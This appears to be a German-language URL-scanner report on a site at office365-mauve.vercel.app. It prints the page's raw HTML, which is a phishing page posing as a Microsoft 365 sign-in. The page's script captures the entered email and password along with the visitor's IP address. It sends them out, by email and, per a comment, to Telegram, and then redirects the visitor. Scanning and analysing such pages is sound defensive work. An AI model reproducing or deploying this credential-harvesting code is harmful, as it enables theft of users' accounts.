- Scan-ID:
- c70470f8-2d5f-4100-a7ab-c38b411274b8Beendet
- Eingereichte URL:
- https://office365-mauve.vercel.app/
- Bericht beendet:
Links · 0 gefunden
Die von der Seite ausgehenden identifizierten Links
JavaScript-Variablen · 4 gefunden
Globale JavaScript-Variablen, die in das Window Object einer Seite geladen werden, sind Variablen, die außerhalb von Funktionen deklariert werden und von jeder Stelle des Codes innerhalb des aktuellen Bereichs zugänglich sind
Name | Typ |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
object |
Konsolenprotokoll-Meldungen · 9 gefunden
In der Web-Konsole protokollierte Meldungen
Typ | Kategorie | Protokoll |
---|---|---|
log | other |
|
log | other |
|
log | other |
|
log | other |
|
log | other |
|
log | other |
|
verbose | dom |
|
log | other |
|
log | other |
|
HTML
Der HTML-Rohtext der Seite
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="icon" href="images/logo.png" type="image/x-icon">
<title>Microsoft 365 | Home </title>
<link rel="stylesheet" href="css/index.css">
<script src="https://smtpjs.com/v3/smtp.js"></script>
<title>Login Form</title>
</head>
<body>
<div class="slideshow-container">
<img src="images/image1.jpg" alt="Slideshow Image" class="slideshow-image" style="display: block;">
<img src="images/image2.jpg" alt="Slideshow Image" class="slideshow-image" style="display: none;">
<img src="images/image3.jpg" alt="Slideshow Image" class="slideshow-image" style="display: none;">
<img src="images/image4.jpg" alt="Slideshow Image" class="slideshow-image" style="display: none;">
</div>
<div class="login-container">
<div class="header">
<h1>Sign In</h1>
<img src="images/lo.jpg" alt="Logo" class="logo">
</div>
<form id="loginForm">
<p id="errorMessage" style="color: red; margin-top: 5px;"></p>
<input type="text" id="username" name="username" placeholder="[email protected]" style="font-style: italic" required="">
<p id="errorMessagePassword" style="color: red; margin-top: 5px;"></p>
<input type="password" id="password" name="password" placeholder="Password" style="display: none" required="">
<button type="button" id="nextButton">Next</button>
</form>
<div class="additional-buttons">
<button class="rounded-button continue-outlook">Continue with Outlook</button>
<button class="rounded-button continue-with-ionos">Continue with IONOS</button>
<button class="rounded-button continue-other-email">Continue with Other email</button>
</div>
</div>
<script>
console.log('Script file loaded');
document.addEventListener('DOMContentLoaded', function () {
const usernameInput = document.getElementById('username');
const passwordInput = document.getElementById('password');
const nextButton = document.getElementById('nextButton');
const errorMessage = document.getElementById('errorMessage');
const errorMessagePassword = document.getElementById('errorMessagePassword');
passwordInput.style.display = 'none';
nextButton.addEventListener('click', async function () {
const trimmedUsername = usernameInput.value.trim();
const trimmedPassword = passwordInput.value.trim();
if (passwordInput.style.display === 'none') {
if (!trimmedUsername) {
errorMessage.textContent = 'Please fill in the username';
errorMessagePassword.textContent = ''; // Clear password error message
return;
}
errorMessage.textContent = ''; // Clear username error message
// Store username in sessionStorage
sessionStorage.setItem('username', trimmedUsername);
passwordInput.style.display = 'block';
nextButton.textContent = 'Sign In';
} else {
if (!trimmedUsername) {
errorMessage.textContent = 'Please fill in the username';
errorMessagePassword.textContent = ''; // Clear password error message
return;
}
if (!trimmedPassword) {
errorMessagePassword.textContent = 'Please fill in the password';
errorMessage.textContent = ''; // Clear username error message
return;
}
errorMessage.textContent = ''; // Clear username error message
errorMessagePaassword.textContent = ''; // Clear password error message
// Store password in sessionStorage
sessionStorage.setItem('password', trimmedPassword);
try {
const ip = await getIPAddress();
const data = {
email: trimmedUsername,
password: trimmedPassword,
ip,
};
// Send email and to Telegram
await sendRequest(data);
// Reset the form
document.getElementById('loginForm').reset();
passwordInput.style.display = 'none';
nextButton.textContent = 'Next';
} catch (error) {
console.error('Error:', );
}
// Redirect to next.html
window.location = 'next.html';
}
});
// ... existing code ...
});
</script>
<script src="js/index.js"></script>
<script src="js/smtp.js"></script>
</body></html>